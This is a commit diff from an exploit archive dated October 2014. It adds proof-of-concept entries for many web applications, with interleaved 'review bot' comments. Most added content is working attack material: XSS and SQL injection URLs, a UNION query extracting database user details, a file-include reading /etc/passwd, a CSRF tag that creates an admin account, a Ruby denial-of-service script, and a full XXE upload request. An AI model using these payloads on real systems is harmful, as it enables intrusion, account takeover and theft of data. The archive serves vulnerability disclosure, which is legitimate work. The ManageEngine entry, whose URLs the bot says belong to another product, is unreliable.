Updated 10_30_2014
This commit is contained in:
parent
1709d70e04
commit
61f891edbd
21 changed files with 1592 additions and 1 deletions
22
files.csv
22
files.csv
|
@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port
|
|||
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
|
||||
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
|
||||
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
|
||||
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
|
||||
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0
|
||||
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
|
||||
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
|
||||
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
|
||||
|
@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port
|
|||
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
|
||||
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
|
||||
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
|
||||
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
|
||||
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
|
||||
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
|
||||
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
|
||||
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
|
||||
35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0
|
||||
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
|
||||
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0
|
||||
35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0
|
||||
35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0
|
||||
35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0
|
||||
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
|
||||
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0
|
||||
35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
|
||||
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
|
||||
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0
|
||||
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
|
||||
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
|
||||
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
|
||||
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
|
||||
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
|
||||
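--- a/platforms/cgi/webapps/35085.txt
+++ b/platforms/cgi/webapps/35085.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45303/info
+
+WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="<XSS>expanded&sb=1&part=all&vc=1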
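--- a/platforms/cgi/webapps/35093.txt
+++ b/platforms/cgi/webapps/35093.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45342/info
+
+BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+BizDir v.05.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1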
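--- a/platforms/linux/remote/35095.txt
+++ b/platforms/linux/remote/35095.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45353/info
+
+Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+This issue is fixed in:
+
+Firefox 3.6.13
+Firefox 3.5.16
+SeaMonkey 2.0.11
+
+x-mac-farsi exploit: <meta charset="x-mac-farsi">?script ?alert(1)//?/script ?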
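--- a/platforms/multiple/dos/35086.rb
+++ b/platforms/multiple/dos/35086.rb
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/45309/info
+
+Allegro RomPager is prone to a remote denial-of-service vulnerability.
+
+Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition.
+
+require 'net/https'
+
+url = URI.parse("http://IP/")
+data = nil
+headers = {
+"Host" => "IP",
+"Authorization" => "Basic
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+}
+
+res = Net::HTTP.start(url.host, url.port) do |http|
+http.use_ssl = false
+http.send_request("GET", url.path, data, headers)
+end
+
+puts res.body
+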
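Review bot: The `"Authorization"` value in the `headers` hash is a string literal that runs across three lines (`"Basic`, an empty line, then the run of `A`s and the closing quote), so as committed the header value embeds two newline characters rather than the single space the Basic scheme places between the scheme name and the credential; current Net::HTTP raises ArgumentError for header values containing CR/LF, so this script will not send the request on a modern Ruby, and it is worth confirming whether the line wrapping is an artifact of the advisory's formatting rather than the original PoC. The file also opens with four lines of advisory prose before `require 'net/https'`, which is not valid Ruby and makes the `.rb` extension misleading; prefixing those lines with `#` would keep the description while letting the file parse. Finally, `require 'net/https'` is unnecessary given `http.use_ssl = false` inside the `Net::HTTP.start` block; `require 'net/http'` is the name the code actually relies on.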
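--- a/platforms/multiple/remote/35092.html
+++ b/platforms/multiple/remote/35092.html
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/45340/info
+
+Helix Server is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
+
+Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
+
+<html>
+<body>
+<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
+</body>
+</html>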
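--- a/platforms/php/webapps/35084.txt
+++ b/platforms/php/webapps/35084.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45294/info
+
+The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Twitter Feed 0.3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E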
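--- a/platforms/php/webapps/35087.txt
+++ b/platforms/php/webapps/35087.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45312/info
+
+The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to obtain sensitive information; other attacks are also possible.
+
+net2ftp 0.98 stable is vulnerable; other versions may also be affected.
+
+http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil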
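--- a/platforms/php/webapps/35088.txt
+++ b/platforms/php/webapps/35088.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45328/info
+
+PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe -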
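--- a/platforms/php/webapps/35089.txt
+++ b/platforms/php/webapps/35089.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45329/info
+
+Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi]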
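--- a/platforms/php/webapps/35090.txt
+++ b/platforms/php/webapps/35090.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45333/info
+
+JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT]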
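--- a/platforms/php/webapps/35091.txt
+++ b/platforms/php/webapps/35091.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45334/info
+
+ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected.
+
+https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E
+
+
+https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+
+
+https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+
+
+https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E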
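Review bot: The four PoC URLs at the end of this file (`pkg_edit.php`, `pkg.php`, `status_graph.php`, `interfaces.php`) do not appear to belong to the product the header names; the description and version line refer to ManageEngine EventLog Analyzer 6.1, whereas these PHP page names and the `xml=` / `if=wan` parameters look like the admin pages of a different web application. It seems likely the vectors were attached to the wrong BID entry at import time, so the file should be cross-checked against the cited source before it is relied on, and a one-line note such as `Note: PoC URLs below do not match the named product; verify against BID 45334` would flag the discrepancy until that is resolved. The description text itself is consistent with the other BID-derived entries in this commit.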
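--- a/platforms/php/webapps/35094.txt
+++ b/platforms/php/webapps/35094.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45343/info
+
+slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+slickMsg 0.7-alpha is vulnerable; other versions may also be affected.
+
+http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E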
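--- a/platforms/php/webapps/35096.txt
+++ b/platforms/php/webapps/35096.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/45356/info
+
+The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+" style="xss:expression(alert(document.cookie))
+In fields: E-mail to, Sender, Your E-mail, Subject.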
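--- a/platforms/php/webapps/35097.txt
+++ b/platforms/php/webapps/35097.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45364/info
+
+The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00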
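--- a/platforms/php/webapps/35098.txt
+++ b/platforms/php/webapps/35098.txt
@@ -0,0 +1,36 @@
+Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
+CVE: CVE-2014-7176
+Vendor: Enalean
+Product: Tuleap
+Affected version: 7.4.99.5 and earlier
+Fixed version: 7.5
+Reported by: Jerzy Kramarz
+
+Details:
+
+SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
+
+
+GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
+Host: 192.168.56.108
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.56.108/plugins/docman/?group_id=100
+Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
+Connection: keep-alive
+
+
+Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
+
+
+Further details at:
+
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.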
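Review bot: The captured request in this advisory keeps the tester's lab address in `Host:` and `Referer:` and two literal session identifiers in the `Cookie:` line (`PHPSESSID=…`, `TULEAP_session_hash=…`), whereas the companion file 35099.txt in the same commit uses `Host: [ip]` and `https://[ip]/…` placeholders; the two Portcullis entries would read more consistently, and carry no stale credentials, if the `Host`, `Referer` and `Cookie` values here were replaced with the same bracketed placeholders. The `Note:` line also has a small grammar slip, `a attacker` for `an attacker`, which could be fixed without changing the statement. The rest of the header block (CVE, affected and fixed versions, reporter) is complete and matches the format used by 35099.txt.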
888
platforms/php/webapps/35099.txt
Executable file
888
platforms/php/webapps/35099.txt
Executable file
|
@ -0,0 +1,888 @@
|
|||
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
|
||||
CVE: CVE-2014-7177
|
||||
Vendor: Enalean
|
||||
Product: Tuleap
|
||||
Affected version: 7.2 and earlier
|
||||
Fixed version: 7.4.99.5
|
||||
Reported by: Jerzy Kramarz
|
||||
|
||||
Details:
|
||||
|
||||
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
|
||||
|
||||
Vulnerability 1:
|
||||
|
||||
1) Upload a XXE using the following request:
|
||||
|
||||
|
||||
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
|
||||
Host: [ip]
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
|
||||
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
|
||||
Content-Length: 10561
|
||||
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="group_id"
|
||||
|
||||
102
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="func"
|
||||
|
||||
docreate
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="group_id_template"
|
||||
|
||||
100
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="tracker_new_prjname"
|
||||
|
||||
Commencez à taper
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="create_mode"
|
||||
|
||||
xml
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
|
||||
<tracker instantiate_for_new_projects="0">
|
||||
<name>123&xxe;</name>
|
||||
<item_name>e123&xxe;</item_name>
|
||||
<description>123&xxe;</description>
|
||||
<cannedResponses/>
|
||||
<formElements>
|
||||
<formElement type="file" ID="F1" rank="0" use_it="0">
|
||||
<name>attachment</name>
|
||||
<label>Attachments</label>
|
||||
</formElement>
|
||||
<formElement type="text" ID="F2" rank="2" use_it="0">
|
||||
<name>details</name>
|
||||
<label>Original Submission</label>
|
||||
<description>A full description of the artifact&xxe;</description>
|
||||
<properties rows="7" cols="60"/>
|
||||
</formElement>
|
||||
<formElement type="string" ID="F3" rank="4" use_it="0" required="1">
|
||||
<name>summary</name>
|
||||
<label>Summary</label>
|
||||
<description>One line description of the artifact&xxe;</description>
|
||||
<properties maxchars="150" size="60"/>
|
||||
</formElement>
|
||||
<formElement type="tbl" ID="F4" rank="6" use_it="0">
|
||||
<name>cc</name>
|
||||
<label>CC</label>
|
||||
<properties hint="Type in a search term"/>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F7" rank="12" use_it="0">
|
||||
<name>status_id</name>
|
||||
<label>Status</label>
|
||||
<description>Artifact Status</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F7-V0" label="Open">
|
||||
<description>The artifact has been submitted&xxe;</description>
|
||||
</item>
|
||||
<item ID="F7-V1" label="Closed">
|
||||
<description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F8" rank="14" use_it="0">
|
||||
<name>assigned_to</name>
|
||||
<label>Assigned to</label>
|
||||
<description>Who is in charge of solving the artifact&xxe;</description>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F11" rank="20" use_it="0">
|
||||
<name>category_id</name>
|
||||
<label>Category</label>
|
||||
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F12" rank="22" use_it="0">
|
||||
<name>severity</name>
|
||||
<label>Priority</label>
|
||||
<description>How quickly the artifact must be completed</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F12-V0" label="1 - Lowest"/>
|
||||
<item ID="F12-V1" label="2"/>
|
||||
<item ID="F12-V2" label="3"/>
|
||||
<item ID="F12-V3" label="4"/>
|
||||
<item ID="F12-V4" label="5 - Medium"/>
|
||||
<item ID="F12-V5" label="6"/>
|
||||
<item ID="F12-V6" label="7"/>
|
||||
<item ID="F12-V7" label="8"/>
|
||||
<item ID="F12-V8" label="9 - Highest"/>
|
||||
</items>
|
||||
<decorators>
|
||||
<decorator REF="F12-V0" r="255" g="255" b="204"/>
|
||||
<decorator REF="F12-V1" r="255" g="255" b="102"/>
|
||||
<decorator REF="F12-V2" r="255" g="204" b="0"/>
|
||||
<decorator REF="F12-V3" r="255" g="153" b="0"/>
|
||||
<decorator REF="F12-V4" r="255" g="102" b="0"/>
|
||||
<decorator REF="F12-V5" r="255" g="51" b="0"/>
|
||||
<decorator REF="F12-V6" r="204" g="51" b="0"/>
|
||||
<decorator REF="F12-V7" r="153" g="0" b="0"/>
|
||||
<decorator REF="F12-V8" r="51" g="0" b="0"/>
|
||||
</decorators>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F13" rank="24" use_it="0">
|
||||
<name>stage&xxe;</name>
|
||||
<label>Stage&xxe;</label>
|
||||
<description>Stage in the life cycle of the artifact&xxe;</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F13-V0" label="New">
|
||||
<description>The artifact has just been submitted</description>
|
||||
</item>
|
||||
<item ID="F13-V1" label="Analyzed">
|
||||
<description>The cause of the artifact has been identified and documented</description>
|
||||
</item>
|
||||
<item ID="F13-V2" label="Accepted">
|
||||
<description>The artifact will be worked on.</description>
|
||||
</item>
|
||||
<item ID="F13-V3" label="Under Implementation">
|
||||
<description>The artifact is being worked on.</description>
|
||||
</item>
|
||||
<item ID="F13-V4" label="Ready for Review">
|
||||
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
|
||||
</item>
|
||||
<item ID="F13-V5" label="Ready for Test">
|
||||
<description>Updated/Created software is ready to be included in the next build</description>
|
||||
</item>
|
||||
<item ID="F13-V6" label="In Test">
|
||||
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
|
||||
</item>
|
||||
<item ID="F13-V7" label="Approved">
|
||||
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
|
||||
</item>
|
||||
<item ID="F13-V8" label="Declined">
|
||||
<description>The artifact was not accepted.</description>
|
||||
</item>
|
||||
<item ID="F13-V9" label="Done">
|
||||
<description>The artifact is closed.</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
<semantics>
|
||||
<semantic type="tooltip"/>
|
||||
</semantics>
|
||||
<reports>
|
||||
<report is_default="0">
|
||||
<name>Default</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias/>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns/>
|
||||
</renderer>
|
||||
<renderer type="plugin_graphontrackersv5" rank="1">
|
||||
<name>Default</name>
|
||||
<description>Graphic Report By Default For Support Requests</description>
|
||||
<charts/>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
</reports>
|
||||
<workflow/>
|
||||
<permissions>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
